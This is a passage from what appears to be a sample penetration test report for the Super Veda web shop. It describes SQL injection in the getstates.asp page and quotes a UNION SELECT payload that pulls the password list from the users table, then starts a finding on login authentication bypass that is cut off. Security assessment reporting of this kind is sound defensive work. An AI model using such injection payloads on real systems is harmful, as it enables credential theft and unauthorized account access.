APPLICATION PENETRATION TEST SUPER VEDA

Application Penetration Test for Super Veda- Sample Report -pricings, or overwriting of the pricing of already existing products. Later onthe attacker can purchase those very same products for a lower price.A detailed explanation of the attack is given in Appendix A.5.1.5 getstates.aspThe getstates.asp page is accessed from the registerx.asp page. When auser signing up for the first time chooses a country that has states (e.g.United States), those are loaded from the database, and added to theregistration form. The getstates.asp page gets a countryid parameterwhich indicates the country to which states are to be loaded. With thiscountryid an SQL query is formed that loads the list of states. Changingthe id or adding a "'" sign to it results in an SQL error which indicates thepossibility of SQL injection to this page.In a way similar to that of the above SQL injections, an attacker can usethe UNION SELECT in order to change the original SQL, which has thefollowing form:to the following:SELECT FROM Countries WHERE countryID=223SELECT FROM Countries WHERE countryID=223 UNION SELECT 1,password,1 FROM usersWhich – again – would give the passwords list from the users database.Notice that in this query the SELECT probably has a GROUP BYstatement too, which can be learned from the fact that the returned list isordered.See the step by step reconstruction of the attack in Appendix A.5.2 UNAUTHORIZED ACCESS TO ACCOUNTSSeverity: CriticalAn attacker can access accounts of all individual users without priorknowledge of their password, thus bypassing the application'sauthentication.In the login.asp page there's a query for the user's username andpassword. Getting those two parameters the application builds an SQLquery similar to this one:ImpervaPage20 of73